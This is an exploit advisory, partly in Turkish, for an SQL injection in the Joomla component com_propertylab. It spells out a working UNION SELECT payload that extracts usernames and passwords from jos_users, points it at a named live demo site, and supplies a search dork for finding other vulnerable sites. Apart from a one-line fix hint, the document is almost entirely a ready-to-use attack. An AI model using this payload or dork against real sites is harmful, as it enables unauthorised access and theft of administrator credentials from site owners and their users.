<------------------- header data start ------------------- >

#############################################################

# author : Kadir DOGAN

# Script Name : Joomla Component com_propertylab (showstate&id) SQL injection Vuln.

# Bug Type : SqL Injections

# Infection : Admin giris bilgileri alinabilir.

# Demo Script : habitatnationwide.com

# Demo Vuln. : habitatnationwide.com/index.php?option=com_propertylab&task=showstate&id=35+and+1=2+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+jos_users

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

# Dork : inurl:index.php?option=com_propertylab


#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

index.php?option=com_propertylab&task=showstate&id=[SqL]


< -- bug code end of -- >